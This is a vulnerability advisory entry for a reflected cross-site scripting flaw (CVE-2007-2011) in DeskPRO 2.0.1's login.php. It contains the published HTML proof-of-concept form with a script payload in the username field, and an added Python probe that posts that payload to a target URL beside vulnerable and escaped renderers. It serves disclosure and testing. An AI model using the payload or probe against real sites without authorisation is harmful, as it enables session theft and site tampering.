DeskPro 'login.php' Cross-Site Scripting Vulnerability

Vulnerability ID 1112655 Vulnerability type Cross-site scripting
Published 2007-04-09 Updated 2007-04-13
CVE ID CVE-2007-2011 CNNVD ID CNNVD-200704-224
Platform PHP CVSS score 4.3
|Sources
https://www.exploit-db.com/exploits/29828
https://cxsecurity.com/issue/WLB-2007040063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-224
|Vulnerability details
A cross-site scripting vulnerability exists in login.php of DeskPro. A remote attacker can inject arbitrary web script or HTML via the username parameter, which is reflected into the login page without being sanitized.
|Exploit
source: http://www.securityfocus.com/bid/23381/info

DeskPRO is prone to an HTML-injection vulnerability because login.php fails to properly sanitize the user-supplied username parameter before echoing it back into the page.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

DeskPRO 2.0.1 is vulnerable to this issue.

<html>
<head><title>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</title></head>
<body>

<center><br><br><font size=4>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John
Martinelli</a></font><br>

<br><br>
<!-- The hidden fields reproduce the parameters of the published PoC;
     only "username" carries the payload. Replace target.com with the host under test. -->
<form action="http://target.com/login.php" method="post">
<input type=hidden name="login_form" value="login">
<input type=hidden name="_getvars" value="getvars">
<input type=hidden name="_postvars" value="postvars">
<input type=hidden name="_filevars" value="filevars">
<input type=hidden name="password" value="password">
<input type=hidden name="remember" value=0>
<!-- The payload contains double quotes, so the attribute is single-quoted
     to keep this page well-formed; the submitted value is unchanged. -->
<input name="username" size=75 value='<"<<script>alert(1);</script>"'>
<input type=submit value="Execute XSS Attack" class="button">
</form>
</center>

</body></html>
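The following is an added example, not DeskPRO's code and not part of the advisory. It shows the attribute-context reflection described above as a vulnerable renderer beside a hardened one, and a check that submits the PoC's form fields to a URL and classifies whether the username comes back raw (exploitable) or entity-encoded. The two renderer functions are stand-ins for what login.php does, not DeskPRO's actual source; the form field names and payload are taken from the PoC above, and the target URL passed to `probe()` is whatever host you are authorised to test.

```python
"""Reflected-XSS check for a login form that echoes the "username" field.

Added example (not DeskPRO or advisory code). The renderers below are
stand-ins for login.php; the field names come from the published PoC.
"""
import html
import urllib.parse
import urllib.request

# Parameters taken from the PoC form; "username" is the injection point.
POC_FIELDS = {
    "login_form": "login",
    "_getvars": "getvars",
    "_postvars": "postvars",
    "_filevars": "filevars",
    "password": "password",
    "remember": "0",
}

# Payload from the PoC: breaks out of a double-quoted value="..." attribute.
POC_PAYLOAD = '<"<<script>alert(1);</script>"'


def vulnerable_login_form(username):
    """Stand-in for a login page that echoes the submitted username raw."""
    return ('<form action="login.php" method="post">'
            '<input name="username" value="%s"></form>' % username)


def hardened_login_form(username):
    """Same page with attribute-safe escaping.

    html.escape(quote=True) is the equivalent of PHP's
    htmlspecialchars($username, ENT_QUOTES): it encodes < > & " and '.
    """
    return ('<form action="login.php" method="post">'
            '<input name="username" value="%s"></form>'
            % html.escape(username, quote=True))


def classify_reflection(body, payload):
    """'unescaped' if the payload appears verbatim (exploitable),
    'escaped' if only its entity-encoded form appears, 'absent' otherwise."""
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def build_login_post(username):
    """Encode the PoC's POST body with the given username."""
    fields = dict(POC_FIELDS)
    fields["username"] = username
    return urllib.parse.urlencode(fields).encode()


def probe(url, payload=POC_PAYLOAD, timeout=10):
    """POST the PoC fields to url and classify the response.

    url is supplied by the caller; only run this against systems you are
    authorised to test.
    """
    req = urllib.request.Request(url, data=build_login_post(payload), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
    return classify_reflection(body, payload)


if __name__ == "__main__":
    # Offline demonstration on constructed responses from the two renderers.
    for name, render in (("vulnerable", vulnerable_login_form),
                         ("hardened", hardened_login_form)):
        print(name, classify_reflection(render(POC_PAYLOAD), POC_PAYLOAD))
```

`probe()` reports "unescaped" when the server reflects the payload verbatim, which is the condition the advisory describes; "escaped" means the username is still echoed but entity-encoded, so the attribute cannot be broken out of; "absent" means the page does not echo the field at all (for example after a redirect), so the check is inconclusive rather than negative.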
|References

Source: BID
Name: 23381
Link: http://www.securityfocus.com/bid/23381
Source: BUGTRAQ
Name: 20070408 DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/465089/100/0/threaded
Source: SECUNIA
Name: 24844
Link: http://secunia.com/advisories/24844
Source: OSVDB
Name: 34721
Link: http://osvdb.org/34721
Source: VUPEN
Name: ADV-2007-1320
Link: http://www.frsirt.com/english/advisories/2007/1320
Source: SREASON
Name: 2556
Link: http://securityreason.com/securityalert/2556
Source: MISC
Link: http://john-martinelli.com/work/deskpro.txt